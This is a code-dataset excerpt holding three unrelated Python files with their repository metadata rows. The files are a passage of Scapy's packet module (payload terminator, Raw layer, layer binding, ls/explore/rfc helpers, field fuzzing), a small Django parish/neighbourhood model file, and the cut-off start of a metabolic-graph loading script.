    By default, this only implements conversion to ``Raw``.
    :param other_cls: Reference to a Packet class to convert to.
    :type other_cls: Type[scapy.packet.Packet]
    :return: Converted form of the packet.
    :rtype: other_cls
    :raises TypeError: When conversion is not possible
    """
    if not issubtype(other_cls, Packet):
        raise TypeError("{} must implement Packet".format(other_cls))

    if other_cls is Raw:
        return Raw(raw(self))

    if "_internal" not in kwargs:
        # First try the target class's own converter; _internal prevents
        # the two convert methods from bouncing back and forth forever.
        return other_cls.convert_packet(self, _internal=True, **kwargs)

    raise TypeError("Cannot convert {} to {}".format(
        type(self).__name__, other_cls.__name__))
@classmethod
def convert_packet(cls, pkt, **kwargs):
    # type: (Packet, **Any) -> Packet
    """Converts another packet to be this type.
    This is not guaranteed to be a lossless process.
    :param pkt: The packet to convert.
    :type pkt: scapy.packet.Packet
    :return: Converted form of the packet.
    :rtype: cls
    :raises TypeError: When conversion is not possible
    """
    if not isinstance(pkt, Packet):
        raise TypeError("Can only convert Packets")

    if "_internal" not in kwargs:
        # Mirror of convert_to: _internal breaks the mutual recursion.
        return pkt.convert_to(cls, _internal=True, **kwargs)

    raise TypeError("Cannot convert {} to {}".format(
        type(pkt).__name__, cls.__name__))
@classmethod
def convert_packets(cls,
                    pkts,  # type: List[Packet]
                    **kwargs  # type: Any
                    ):
    # type: (...) -> Iterator[Iterator[Packet]]
    """Converts many packets to this type.
    This is implemented as a generator.
    See ``Packet.convert_packet``.
    """
    for pkt in pkts:
        yield cls.convert_packet(pkt, **kwargs)
class NoPayload(Packet):
    """Terminator of every payload chain: a singleton, inert Packet that
    answers all Packet-protocol methods with empty/neutral values so the
    recursive build/dissect/show algorithms need no special-casing."""

    def __new__(cls, *args, **kargs):
        # type: (Type[Packet], *Any, **Any) -> Packet
        # Singleton: the one instance is cached on the class itself.
        singl = cls.__dict__.get("__singl__")
        if singl is None:
            cls.__singl__ = singl = Packet.__new__(cls)
            Packet.__init__(singl)
        return singl  # type: ignore

    def __init__(self, *args, **kargs):
        # type: (*Any, **Any) -> None
        # Initialization happened once in __new__; do nothing per call.
        pass

    def dissection_done(self, pkt):
        # type: (Packet) -> None
        pass

    def add_payload(self, payload):
        # type: (Union[Packet, bytes]) -> NoReturn
        raise Scapy_Exception("Can't add payload to NoPayload instance")

    def remove_payload(self):
        # type: () -> None
        pass

    def add_underlayer(self, underlayer):
        # type: (Any) -> None
        pass

    def remove_underlayer(self, other):
        # type: (Packet) -> None
        pass

    def copy(self):
        # type: () -> NoPayload
        # Singleton: copying returns the same shared instance.
        return self

    def clear_cache(self):
        # type: () -> None
        pass

    def __repr__(self):
        # type: () -> str
        return ""

    def __str__(self):
        # type: () -> str
        return ""

    def __bytes__(self):
        # type: () -> bytes
        return b""

    def __nonzero__(self):
        # type: () -> bool
        # Falsy, so "while pkt.payload:" loops terminate here.
        return False
    __bool__ = __nonzero__

    def do_build(self):
        # type: () -> bytes
        return b""

    def build(self):
        # type: () -> bytes
        return b""

    def build_padding(self):
        # type: () -> bytes
        return b""

    def build_done(self, p):
        # type: (bytes) -> bytes
        return p

    def build_ps(self, internal=0):
        # type: (int) -> Tuple[bytes, List[Any]]
        return b"", []

    def getfieldval(self, attr):
        # type: (str) -> NoReturn
        raise AttributeError(attr)

    def getfield_and_val(self, attr):
        # type: (str) -> NoReturn
        raise AttributeError(attr)

    def setfieldval(self, attr, val):
        # type: (str, Any) -> NoReturn
        raise AttributeError(attr)

    def delfieldval(self, attr):
        # type: (str) -> NoReturn
        raise AttributeError(attr)

    def hide_defaults(self):
        # type: () -> None
        pass

    def __iter__(self):
        # type: () -> Iterator[Packet]
        return iter([])

    def __eq__(self, other):
        # type: (Any) -> bool
        # All NoPayload instances are the singleton, hence equal.
        if isinstance(other, NoPayload):
            return True
        return False

    def hashret(self):
        # type: () -> bytes
        return b""

    def answers(self, other):
        # type: (NoPayload) -> bool
        return isinstance(other, (NoPayload, conf.padding_layer))  # noqa: E501

    def haslayer(self, cls, _subclass=None):
        # type: (Union[Type[Packet], str], Optional[bool]) -> int
        return 0

    def getlayer(self,
                 cls,  # type: Union[int, Type[Packet], str]
                 nb=1,  # type: int
                 _track=None,  # type: Optional[List[int]]
                 _subclass=None,  # type: Optional[bool]
                 **flt  # type: Any
                 ):
        # type: (...) -> Optional[Packet]
        # Report back how many matches are still missing via _track.
        if _track is not None:
            _track.append(nb)
        return None

    def fragment(self, *args, **kargs):
        # type: (*Any, **Any) -> List[Packet]
        raise Scapy_Exception("cannot fragment this packet")

    def show(self, dump=False, indent=3, lvl="", label_lvl=""):
        # type: (bool, int, str, str) -> None
        pass

    def sprintf(self, fmt, relax=1):
        # type: (str, int) -> str
        # A directive reached the end of the chain without being resolved.
        if relax:
            return "??"
        else:
            raise Scapy_Exception("Format not found [%s]" % fmt)

    def _do_summary(self):
        # type: () -> Tuple[int, str, List[Any]]
        return 0, "", []

    def layers(self):
        # type: () -> List[Type[Packet]]
        return []

    def lastlayer(self, layer=None):
        # type: (Optional[Packet]) -> Packet
        return layer or self

    def command(self):
        # type: () -> str
        return ""

    def route(self):
        # type: () -> Tuple[None, None, None]
        return (None, None, None)
####################
# packet classes #
####################
class Raw(Packet):
    """Opaque data layer: carries raw bytes with no further dissection."""
    name = "Raw"
    fields_desc = [StrField("load", b"")]

    def __init__(self, _pkt=b"", *args, **kwargs):
        # type: (bytes, *Any, **Any) -> None
        # Coerce non-bytes input (e.g. str) to bytes before normal init.
        if _pkt and not isinstance(_pkt, bytes):
            _pkt = bytes_encode(_pkt)
        super(Raw, self).__init__(_pkt, *args, **kwargs)

    def answers(self, other):
        # type: (Packet) -> int
        # Raw carries no protocol semantics, so it matches anything.
        return 1

    def mysummary(self):
        # type: () -> str
        summarizer = conf.raw_summary
        if not summarizer:
            return Packet.mysummary(self)
        if callable(summarizer):
            return "Raw %s" % summarizer(self.load)
        return "Raw %r" % self.load

    @classmethod
    def convert_packet(cls, pkt, **kwargs):
        # type: (Packet, **Any) -> Raw
        return Raw(raw(pkt))
class Padding(Raw):
    """Trailing bytes that belong to no upper layer: contribute nothing
    to the layer body, only to the packet's padding."""
    name = "Padding"

    def self_build(self, field_pos_list=None):
        # type: (Optional[Any]) -> bytes
        # Padding never appears in the layer body itself.
        return b""

    def build_padding(self):
        # type: () -> bytes
        # Prefer the cached raw bytes from dissection when available.
        if self.raw_packet_cache is not None:
            own = self.raw_packet_cache
        else:
            own = bytes_encode(self.load)
        return own + self.payload.build_padding()
# Register the fallback layers in the global configuration so dissectors
# can reach them without importing this module directly.
conf.raw_layer = Raw
conf.padding_layer = Padding
if conf.default_l2 is None:
    conf.default_l2 = Raw
#################
# Bind layers #
#################
def bind_bottom_up(lower,  # type: Type[Packet]
                   upper,  # type: Type[Packet]
                   __fval=None,  # type: Optional[Any]
                   **fval  # type: Any
                   ):
    # type: (...) -> None
    r"""Bind 2 layers for dissection.
    The upper layer will be chosen for dissection on top of the lower layer, if
    ALL the passed arguments are validated. If multiple calls are made with
    the same layers, the last one will be used as default.

    ex:
        >>> bind_bottom_up(Ether, SNAP, type=0x1234)
        >>> Ether(b'\xff\xff\xff\xff\xff\xff\xd0P\x99V\xdd\xf9\x124\x00\x00\x00\x00\x00')  # noqa: E501
        <Ether dst=ff:ff:ff:ff:ff:ff src=d0:50:99:56:dd:f9 type=0x1234 |<SNAP OUI=0x0 code=0x0 |>>  # noqa: E501
    """
    if __fval is not None:
        fval.update(__fval)
    # Work on a copy so subclasses sharing the class attribute are not
    # mutated, then publish the extended guess list.
    guesses = lower.payload_guess[:]
    guesses.append((fval, upper))
    lower.payload_guess = guesses
def bind_top_down(lower,  # type: Type[Packet]
                  upper,  # type: Type[Packet]
                  __fval=None,  # type: Optional[Any]
                  **fval  # type: Any
                  ):
    # type: (...) -> None
    """Bind 2 layers for building.

    When *upper* is added as the payload of *lower*, the given field
    values are applied to the lower layer.

    Example: bind_top_down(Ether, SNAP, type=0x1234) makes Ether()/SNAP()
    build with type=0x1234.
    """
    if __fval is not None:
        fval.update(__fval)
    # Copy-on-write so subclasses sharing the dict are not affected.
    overloads = upper._overload_fields.copy()
    overloads[lower] = fval
    upper._overload_fields = overloads
@conf.commands.register
def bind_layers(lower,  # type: Type[Packet]
                upper,  # type: Type[Packet]
                __fval=None,  # type: Optional[Dict[str, int]]
                **fval  # type: Any
                ):
    # type: (...) -> None
    """Bind 2 layers on some specific fields' values, for both building
    and dissection.

    Equivalent to calling bind_top_down and bind_bottom_up with the same
    arguments; see help(bind_bottom_up) and help(bind_top_down).
    """
    if __fval is not None:
        fval.update(__fval)
    # Apply the binding in both directions with the merged field values.
    for binder in (bind_top_down, bind_bottom_up):
        binder(lower, upper, **fval)
def split_bottom_up(lower,  # type: Type[Packet]
                    upper,  # type: Type[Packet]
                    __fval=None,  # type: Optional[Any]
                    **fval  # type: Any
                    ):
    # type: (...) -> None
    """Un-link an association made with bind_bottom_up.

    Only entries bound to *upper* whose field values all match exactly
    are removed. See help(bind_bottom_up).
    """
    if __fval is not None:
        fval.update(__fval)

    def keep(entry):
        # type: (Tuple[Dict[str, int], Type[Packet]]) -> bool
        params, cls = entry
        if cls != upper:
            return True
        # Drop only when every bound field value matches exactly.
        return any(params.get(k, _keep_sentinel) != v
                   for k, v in fval.items())

    _keep_sentinel = object()
    lower.payload_guess = [entry for entry in lower.payload_guess
                           if keep(entry)]
def split_top_down(lower,  # type: Type[Packet]
                   upper,  # type: Type[Packet]
                   __fval=None,  # type: Optional[Any]
                   **fval  # type: Any
                   ):
    # type: (...) -> None
    """Un-link an association made with bind_top_down.

    The binding is removed only when every given field value matches the
    one currently bound. See help(bind_top_down).
    """
    if __fval is not None:
        fval.update(__fval)
    if lower not in upper._overload_fields:
        return
    bound = upper._overload_fields[lower]
    missing = object()
    for k, v in fval.items():
        if bound.get(k, missing) != v:
            # At least one field value differs: not the binding we target.
            return
    # Copy-on-write before deleting, as in bind_top_down.
    overloads = upper._overload_fields.copy()
    del overloads[lower]
    upper._overload_fields = overloads
@conf.commands.register
def split_layers(lower,  # type: Type[Packet]
                 upper,  # type: Type[Packet]
                 __fval=None,  # type: Optional[Any]
                 **fval  # type: Any
                 ):
    # type: (...) -> None
    """Split 2 layers previously bound with bind_layers.

    Reverses both the dissection (bind_bottom_up) and the building
    (bind_top_down) associations. See help(split_bottom_up) and
    help(split_top_down).
    """
    if __fval is not None:
        fval.update(__fval)
    # Undo the binding in both directions with the merged field values.
    for splitter in (split_bottom_up, split_top_down):
        splitter(lower, upper, **fval)
@conf.commands.register
def explore(layer=None):
    # type: (Optional[str]) -> None
    """Discover the Scapy layers and protocols.

    Helps to see which packets exist in contrib or layer files.

    :param layer: if specified, explore that layer (short name, full
        module name, or the module object itself). If None, launch the
        interactive GUI to browse the available layers.

    examples:
      >>> explore()  # Launches the GUI
      >>> explore("dns")  # Explore scapy.layers.dns
      >>> explore("http2")  # Explore scapy.contrib.http2
      >>> explore(scapy.layers.bluetooth4LE)

    Note: to search a packet by name, use ls("name") rather than explore.
    """
    if layer is None:  # GUI MODE
        if not conf.interactive:
            raise Scapy_Exception("explore() GUI-mode cannot be run in "
                                  "interactive mode. Please provide a "
                                  "'layer' parameter !")
        # 0 - Imports
        try:
            import prompt_toolkit
        except ImportError:
            raise ImportError("prompt_toolkit is not installed ! "
                              "You may install IPython, which contains it, via"
                              " `pip install ipython`")
        if not _version_checker(prompt_toolkit, (2, 0)):
            raise ImportError("prompt_toolkit >= 2.0.0 is required !")
        # Only available with prompt_toolkit > 2.0, not released on PyPi yet
        from prompt_toolkit.shortcuts.dialogs import radiolist_dialog, \
            button_dialog
        from prompt_toolkit.formatted_text import HTML
        # Check for prompt_toolkit >= 3.0.0
        # call_ptk abstracts the API change: in ptk >= 3 a dialog must be
        # .run(); before that the dialog call already returned the result.
        call_ptk = lambda x: cast(str, x)  # type: Callable[[Any], str]
        if _version_checker(prompt_toolkit, (3, 0)):
            call_ptk = lambda x: x.run()  # type: ignore
        # 1 - Ask for layer or contrib
        btn_diag = button_dialog(
            title=six.text_type("Scapy v%s" % conf.version),
            text=HTML(
                six.text_type(
                    '<style bg="white" fg="red">Chose the type of packets'
                    ' you want to explore:</style>'
                )
            ),
            buttons=[
                (six.text_type("Layers"), "layers"),
                (six.text_type("Contribs"), "contribs"),
                (six.text_type("Cancel"), "cancel")
            ])
        action = call_ptk(btn_diag)
        # 2 - Retrieve list of Packets
        if action == "layers":
            # Get all loaded layers
            lvalues = conf.layers.layers()
            # Restrict to layers-only (not contribs) + packet.py and asn1*.py
            values = [x for x in lvalues if ("layers" in x[0] or
                                             "packet" in x[0] or
                                             "asn1" in x[0])]
        elif action == "contribs":
            # Get all existing contribs
            from scapy.main import list_contrib
            cvalues = cast(List[Dict[str, str]], list_contrib(ret=True))
            values = [(x['name'], x['description'])
                      for x in cvalues]
            # Remove very specific modules
            values = [x for x in values if "can" not in x[0]]
        else:
            # Escape/Cancel was pressed
            return
        # Python 2 compat
        if six.PY2:
            values = [(six.text_type(x), six.text_type(y))
                      for x, y in values]
        # Build tree
        if action == "contribs":
            # A tree is a dictionary. Each layer contains a keyword
            # _l which contains the files in the layer, and a _name
            # argument which is its name. The other keys are the subfolders,
            # which are similar dictionaries
            tree = defaultdict(list)  # type: Dict[str, Union[List[Any], Dict[str, Any]]]  # noqa: E501
            for name, desc in values:
                if "." in name:  # Folder detected
                    parts = name.split(".")
                    subtree = tree
                    for pa in parts[:-1]:
                        if pa not in subtree:
                            subtree[pa] = {}
                        # one layer deeper
                        subtree = subtree[pa]  # type: ignore
                        subtree["_name"] = pa  # type: ignore
                    if "_l" not in subtree:
                        subtree["_l"] = []
                    subtree["_l"].append((parts[-1], desc))  # type: ignore
                else:
                    tree["_l"].append((name, desc))  # type: ignore
        elif action == "layers":
            tree = {"_l": values}
        # 3 - Ask for the layer/contrib module to explore
        # 'previous' is the stack of visited folders, used by "Back".
        current = tree  # type: Any
        previous = []  # type: List[Dict[str, Union[List[Any], Dict[str, Any]]]]  # noqa: E501
        while True:
            # Generate tests & form
            # Folder entries are prefixed with "$" to tell them apart from
            # plain file entries when the dialog result comes back.
            folders = list(current.keys())
            _radio_values = [
                ("$" + name, six.text_type('[+] ' + name.capitalize()))
                for name in folders if not name.startswith("_")
            ] + current.get("_l", [])  # type: List[str]
            cur_path = ""
            if previous:
                cur_path = ".".join(
                    itertools.chain(
                        (x["_name"] for x in previous[1:]),  # type: ignore
                        (current["_name"],)
                    )
                )
            extra_text = (
                '\n<style bg="white" fg="green">> scapy.%s</style>'
            ) % (action + ("." + cur_path if cur_path else ""))
            # Show popup
            rd_diag = radiolist_dialog(
                values=_radio_values,
                title=six.text_type(
                    "Scapy v%s" % conf.version
                ),
                text=HTML(
                    six.text_type((
                        '<style bg="white" fg="red">Please select a file'
                        'among the following, to see all layers contained in'
                        ' it:</style>'
                    ) + extra_text)
                ),
                cancel_text="Back" if previous else "Cancel"
            )
            result = call_ptk(rd_diag)
            if result is None:
                # User pressed "Cancel/Back"
                if previous:  # Back
                    current = previous.pop()
                    continue
                else:  # Cancel
                    return
            if result.startswith("$"):
                # Folder selected: descend one level.
                previous.append(current)
                current = current[result[1:]]
            else:
                # Enter on layer
                if previous:  # In subfolder
                    result = cur_path + "." + result
                break
        # 4 - (Contrib only): load contrib
        if action == "contribs":
            from scapy.main import load_contrib
            load_contrib(result)
            result = "scapy.contrib." + result
    else:  # NON-GUI MODE
        # We handle layer as a short layer name, full layer name
        # or the module itself
        if isinstance(layer, types.ModuleType):
            layer = layer.__name__
        if isinstance(layer, str):
            if layer.startswith("scapy.layers."):
                result = layer
            else:
                if layer.startswith("scapy.contrib."):
                    layer = layer.replace("scapy.contrib.", "")
                from scapy.main import load_contrib
                load_contrib(layer)
                # A short name may be either a layer or a contrib: try both.
                result_layer, result_contrib = (("scapy.layers.%s" % layer),
                                                ("scapy.contrib.%s" % layer))
                if result_layer in conf.layers.ldict:
                    result = result_layer
                elif result_contrib in conf.layers.ldict:
                    result = result_contrib
                else:
                    raise Scapy_Exception("Unknown scapy module '%s'" % layer)
        else:
            warning("Wrong usage ! Check out help(explore)")
            return
    # COMMON PART
    # Get the list of all Packets contained in that module
    try:
        all_layers = conf.layers.ldict[result]
    except KeyError:
        raise Scapy_Exception("Unknown scapy module '%s'" % layer)
    # Print
    print(conf.color_theme.layer_name("Packets contained in %s:" % result))
    rtlst = []  # type: List[Tuple[Union[str, List[str]], ...]]
    rtlst = [(lay.__name__ or "", lay._name or "") for lay in all_layers]
    print(pretty_list(rtlst, [("Class", "Name")], borders=True))
def _pkt_ls(obj,  # type: Union[Packet, Type[Packet]]
            verbose=False,  # type: bool
            ):
    # type: (...) -> List[Tuple[str, Type[AnyField], str, str, List[str]]]  # noqa: E501
    """Internal function used to resolve `fields_desc` to display it.

    :param obj: a packet object or class
    :param verbose: when True, also collect enum/flag value listings
        into the long attributes
    :returns: a list containing tuples [(name, clsname, clsname_extras,
        default, long_attrs)]
    :raises ValueError: if *obj* is neither a Packet class nor instance
    """
    is_pkt = isinstance(obj, Packet)
    if not issubtype(obj, Packet) and not is_pkt:
        raise ValueError
    fields = []
    for f in obj.fields_desc:
        cur_fld = f
        attrs = []  # type: List[str]
        long_attrs = []  # type: List[str]
        # Unwrap decorating fields (Emph/ConditionalField) to reach the
        # real field; a Cond wrapper is noted in the short attributes.
        while isinstance(cur_fld, (Emph, ConditionalField)):
            if isinstance(cur_fld, ConditionalField):
                attrs.append(cur_fld.__class__.__name__[:4])
            cur_fld = cur_fld.fld
        name = cur_fld.name
        default = cur_fld.default
        if verbose and isinstance(cur_fld, EnumField) \
                and hasattr(cur_fld, "i2s"):
            # Only dump small enums; huge value tables would flood output.
            if len(cur_fld.i2s or []) < 50:
                long_attrs.extend(
                    "%s: %d" % (strval, numval)
                    for numval, strval in
                    sorted(six.iteritems(cur_fld.i2s))
                )
        elif isinstance(cur_fld, MultiEnumField):
            # The effective enum depends on another field's value; an
            # instance is needed to resolve it, so build one if required.
            fld_depend = cur_fld.depends_on(
                cast(Packet, obj if is_pkt else obj())
            )
            attrs.append("Depends on %s" % fld_depend)
            if verbose:
                cur_i2s = cur_fld.i2s_multi.get(
                    cur_fld.depends_on(
                        cast(Packet, obj if is_pkt else obj())
                    ), {}
                )
                if len(cur_i2s) < 50:
                    long_attrs.extend(
                        "%s: %d" % (strval, numval)
                        for numval, strval in
                        sorted(six.iteritems(cur_i2s))
                    )
        elif verbose and isinstance(cur_fld, FlagsField):
            names = cur_fld.names
            long_attrs.append(", ".join(names))
        elif isinstance(cur_fld, MultipleTypeField):
            # Display the default of the fallback field and list all the
            # candidate field classes.
            default = cur_fld.dflt.default
            attrs.append(", ".join(
                x[0].__class__.__name__ for x in
                itertools.chain(cur_fld.flds, [(cur_fld.dflt,)])
            ))
        cls = cur_fld.__class__
        class_name_extras = "(%s)" % (
            ", ".join(attrs)
        ) if attrs else ""
        if isinstance(cur_fld, BitField):
            class_name_extras += " (%d bit%s)" % (
                cur_fld.size,
                "s" if cur_fld.size > 1 else ""
            )
        fields.append(
            (name,
             cls,
             class_name_extras,
             repr(default),
             long_attrs)
        )
    return fields
@conf.commands.register
def ls(obj=None,  # type: Optional[Union[str, Packet, Type[Packet]]]
       case_sensitive=False,  # type: bool
       verbose=False  # type: bool
       ):
    # type: (...) -> None
    """List available layers, or infos on a given layer class or name.

    :param obj: Packet class/instance to inspect, a name pattern to
        search for, or None to list every known layer
    :param case_sensitive: if obj is a string, is it case sensitive?
    :param verbose: forwarded to _pkt_ls (adds enum/flag value listings)
    """
    is_string = isinstance(obj, str)

    if obj is None or is_string:
        tip = False
        if obj is None:
            tip = True
            all_layers = sorted(conf.layers, key=lambda x: x.__name__)
        else:
            # Match the pattern against both the class name and the
            # human-readable layer name.
            pattern = re.compile(
                cast(str, obj),
                0 if case_sensitive else re.I
            )
            # We first order by accuracy, then length
            if case_sensitive:
                sorter = lambda x: (x.__name__.index(obj), len(x.__name__))
            else:
                obj = obj.lower()
                sorter = lambda x: (x.__name__.lower().index(obj),
                                    len(x.__name__))
            all_layers = sorted((layer for layer in conf.layers
                                 if (isinstance(layer.__name__, str) and
                                     pattern.search(layer.__name__)) or
                                 (isinstance(layer.name, str) and
                                  pattern.search(layer.name))),
                                key=sorter)
        for layer in all_layers:
            print("%-10s : %s" % (layer.__name__, layer._name))
        if tip and conf.interactive:
            print("\nTIP: You may use explore() to navigate through all "
                  "layers using a clear GUI")
    else:
        try:
            fields = _pkt_ls(
                obj,  # type: ignore
                verbose=verbose
            )
            is_pkt = isinstance(obj, Packet)
            # Print one line per field: name, class info, current value
            # (instances only) and default.
            for fname, cls, clsne, dflt, long_attrs in fields:
                clsinfo = cls.__name__ + " " + clsne
                print("%-10s : %-35s =" % (fname, clsinfo), end=' ')
                if is_pkt:
                    print("%-15r" % (getattr(obj, fname),), end=' ')
                print("(%r)" % (dflt,))
                for attr in long_attrs:
                    print("%-15s%s" % ("", attr))
            # Restart for payload if any
            if is_pkt:
                obj = cast(Packet, obj)
                if isinstance(obj.payload, NoPayload):
                    return
                print("--")
                ls(obj.payload)
        except ValueError:
            print("Not a packet class or name. Type 'ls()' to list packet classes.")  # noqa: E501
@conf.commands.register
def rfc(cls, ret=False, legend=True):
    # type: (Type[Packet], bool, bool) -> Optional[str]
    """
    Generate an RFC-like ASCII-art representation of a packet def.

    Fields are laid out on 32-bit rows, each bit rendered as two
    characters, with '+-' separators between rows.

    :param cls: the Packet class
    :param ret: return the result instead of printing (def. False)
    :param legend: show text under the diagram (default True)
    :raises TypeError: if *cls* is not a Packet subclass

    Ex::

        >>> rfc(Ether)
    """
    if not issubclass(cls, Packet):
        raise TypeError("Packet class expected")
    cur_len = 0
    cur_line = []
    lines = []
    # Get the size (width) that a field will take
    # when formatted, from its length in bits
    clsize = lambda x: 2 * x - 1  # type: Callable[[int], int]
    ident = 0  # Fields UUID
    # Generate packet groups
    # Each entry in a line is (display name, rendered width, field uuid);
    # the uuid lets the separator logic detect a field spanning two rows.
    for f in cls.fields_desc:
        flen = int(f.sz * 8)
        cur_len += flen
        ident += 1
        # Fancy field name
        fname = f.name.upper().replace("_", " ")
        # The field might exceed the current line or
        # take more than one line. Copy it as required
        while True:
            over = max(0, cur_len - 32)  # Exceed
            len1 = clsize(flen - over)  # What fits
            cur_line.append((fname[:len1], len1, ident))
            if cur_len >= 32:
                # Current line is full. start a new line
                lines.append(cur_line)
                cur_len = flen = over
                fname = ""  # do not repeat the field
                cur_line = []
                if not over:
                    # there is no data left
                    break
            else:
                # End of the field
                break
    # Add the last line if un-finished
    if cur_line:
        lines.append(cur_line)
    # Calculate separations between lines
    seps = []
    seps.append("+-" * 32 + "+\n")
    for i in range(len(lines) - 1):
        # Start with a full line
        sep = "+-" * 32 + "+\n"
        # Get the line above and below the current
        # separation
        above, below = lines[i], lines[i + 1]
        # The last field of above is shared with below
        if above[-1][2] == below[0][2]:
            # where the field in "above" starts
            pos_above = sum(x[1] for x in above[:-1])
            # where the field in "below" ends
            pos_below = below[0][1]
            if pos_above < pos_below:
                # they are overlapping.
                # Now crop the space between those pos
                # and fill it with " "
                pos_above = pos_above + pos_above % 2
                sep = (
                    sep[:1 + pos_above] +
                    " " * (pos_below - pos_above) +
                    sep[1 + pos_below:]
                )
        # line is complete
        seps.append(sep)
    # Graph
    result = ""
    # Bytes markers
    result += " " + (" " * 19).join(
        str(x) for x in range(4)
    ) + "\n"
    # Bits markers
    result += " " + " ".join(
        str(x % 10) for x in range(32)
    ) + "\n"
    # Add fields and their separations
    for line, sep in zip(lines, seps):
        result += sep
        for elt, flen, _ in line:
            result += "|" + elt.center(flen, " ")
        result += "|\n"
    result += "+-" * (cur_len or 32) + "+\n"
    # Annotate with the figure name
    if legend:
        result += "\n" + ("Fig. " + cls.__name__).center(66, " ")
    # return if asked for, else print
    if ret:
        return result
    print(result)
    return None
#############
# Fuzzing #
#############
@conf.commands.register
def fuzz(p,  # type: Packet
         _inplace=0,  # type: int
         ):
    # type: (...) -> Packet
    """
    Transform a layer into a fuzzy layer by replacing some default values
    by random objects.

    :param p: the Packet instance to fuzz
    :param _inplace: internal flag; when truthy, mutate *p* instead of
        working on a copy (used for the recursive PacketListField case)
    :return: the fuzzed packet.
    """
    if not _inplace:
        p = p.copy()
    q = p
    # Walk the whole payload chain, layer by layer.
    while not isinstance(q, NoPayload):
        new_default_fields = {}
        multiple_type_fields = []  # type: List[str]
        for f in q.fields_desc:
            if isinstance(f, PacketListField):
                # Recurse into every sub-packet of the list, in place.
                for r in getattr(q, f.name):
                    fuzz(r, _inplace=1)
            elif isinstance(f, MultipleTypeField):
                # the type of the field will depend on others
                multiple_type_fields.append(f.name)
            elif f.default is not None:
                if not isinstance(f, ConditionalField) or f._evalcond(q):
                    rnd = f.randval()
                    if rnd is not None:
                        new_default_fields[f.name] = rnd
        # Process packets with MultipleTypeFields
        if multiple_type_fields:
            # freeze the other random values
            new_default_fields = {
                key: (val._fix() if isinstance(val, VolatileValue) else val)
                for key, val in six.iteritems(new_default_fields)
            }
            q.default_fields.update(new_default_fields)
            # add the random values of the MultipleTypeFields
            # (resolved only now, since their type may depend on the
            # values frozen just above)
            for name in multiple_type_fields:
                fld = cast(MultipleTypeField, q.get_field(name))
                rnd = fld._find_fld_pkt(q).randval()
                if rnd is not None:
                    new_default_fields[name] = rnd
        q.default_fields.update(new_default_fields)
        q = q.payload
    return p
| [
"Tijesuolalekan@gmail.com"
] | Tijesuolalekan@gmail.com |
8470ff9a184b132c991f6f567ce894d7629cc979 | b11efc3a640c948ea67fc5ec48e46888a16bc7be | /taller10/prroyectociudad/ordenamiento/models.py | d7c81de226afc7d904525e4af4496d669fa43efa | [] | no_license | PlataformasWeb-P-AA2021/taller10-Jdesparza | 1850c77d9db21a54249616ea064099588825d0fa | 800abc3826f1cc76a7438e2fc729f385c2a93b96 | refs/heads/main | 2023-06-01T05:29:45.314719 | 2021-06-19T21:18:44 | 2021-06-19T21:18:44 | 378,210,139 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,404 | py | from django.db import models
# Create your models here.
class Parroquia(models.Model):
    """A parish (parroquia), classified as urban or rural."""

    class Meta:
        ordering = ["tipo"]
        verbose_name_plural = "Las Parroquias"

    # Allowed values for 'tipo': (stored value, human-readable label).
    opciones_tipo_parroquia = (
        ('1', 'urbana'),
        ('2', 'rural'),
    )
    nombre = models.CharField(max_length=50)
    tipo = models.CharField(max_length=30, \
                            choices=opciones_tipo_parroquia)

    def __str__(self):
        # type: () -> str
        return "%s - tipo: %s" % (
            self.nombre,
            self.tipo)
class Barrio(models.Model):
    """A neighbourhood (barrio) belonging to a Parroquia."""

    class Meta:
        verbose_name_plural = "Los Barrios"

    # Allowed values for 'numero_parques'; note they are stored as
    # strings '1'..'6', not integers.
    opciones_numero_parques = (
        ('1', '1'),
        ('2', '2'),
        ('3', '3'),
        ('4', '4'),
        ('5', '5'),
        ('6', '6'),
    )
    nombre = models.CharField(max_length=50)
    numero_viviendas = models.IntegerField()
    numero_parques = models.CharField(max_length=30, \
                                      choices=opciones_numero_parques)
    numero_edificios = models.IntegerField()
    # Deleting a Parroquia also deletes its Barrios (CASCADE).
    parroquia = models.ForeignKey(Parroquia, related_name='losbarrios',
                                  on_delete=models.CASCADE)

    def __str__(self):
        # type: () -> str
        return "%s - %d - %s - %d - Parroquia(%s)" % (
            self.nombre,
            self.numero_viviendas,
            self.numero_parques,
            self.numero_edificios,
            self.parroquia.nombre
        )
"jdesparza@utpl.edu.ec"
] | jdesparza@utpl.edu.ec |
5f1c25a06be984814e4f2bfd1e9b5305d27bfc4c | e32dbfa5951cdddf3e6df50e88ae90d8c23d5389 | /Python_scripts/load_graph.py | ea71197dccf19594cd16189c3ce1b462eef11ff3 | [] | no_license | Auwel1/Integration | a32035d15ee17415a4f3c709979e429bc7857255 | 83c2d0dc53f9f8175b74bc6234574b8e5249b1f8 | refs/heads/main | 2023-06-03T06:47:42.648270 | 2021-06-18T14:41:22 | 2021-06-18T14:41:22 | 378,175,896 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,614 | py | import argparse
from xml.dom import minidom as mdom
from xml.etree import ElementTree as ET
import xml
import pandas as pd
import igraph as ig
import networkx as nx
import numpy as np
import matplotlib.pyplot as plt
import pandas as pd
import HMA_connect as hma
import utils
from tqdm import tqdm
import re
# parser = argparse.ArgumentParser
#
# parser.add_argument('-xml', '--xmldoc', help='xml metabolic file')
# parser.add_argument('-t', '--trim', help='path to a node list to eliminate from graph')
# parser.add_argument('-o', '--output', help='output directory path')
# parser.add_argument('-n', '--name', help='file name')
# parser.add_argument('-l', '--list', help = 'list of nodes to trim from the graph')
#
# args = parser.parse_args()
def get_RNAseq_csv(csvpath):
    """Load an RNA-seq table, trying tab separation first, then commas.

    The first column becomes the index and the first row the header.
    """
    table = pd.read_csv(csvpath, index_col=0, sep="\t", header=0)
    if len(table.columns) == 0:
        # Zero data columns means the separator guess was wrong: the
        # whole line was swallowed into the index. Retry with commas.
        table = pd.read_csv(csvpath, index_col=0, sep=",", header=0)
    return table
def get_node_list(df_path):
    """Read the metabolite table (xlsx) and return its 'Metabolite Id' column."""
    table = pd.read_excel(df_path, index_col=0, engine='openpyxl')
    return table['Metabolite Id']
def xml_doc_parsing(path):
    """Parse an SBML/XML model file and return its species and reactions.

    :param path: path to the xml file listing species and reactions
    :return: tuple (species elements, reaction elements) of DOM nodes
    """
    # Fix: the local used to be named 'xml', shadowing the imported xml
    # package, and carried a stray unused 'nodes' chained alias.
    document = mdom.parse(path)
    xml_nodes = document.getElementsByTagName('species')
    xml_edges = document.getElementsByTagName('reaction')
    return xml_nodes, xml_edges
def set_metabo_dict(xml_nodes):
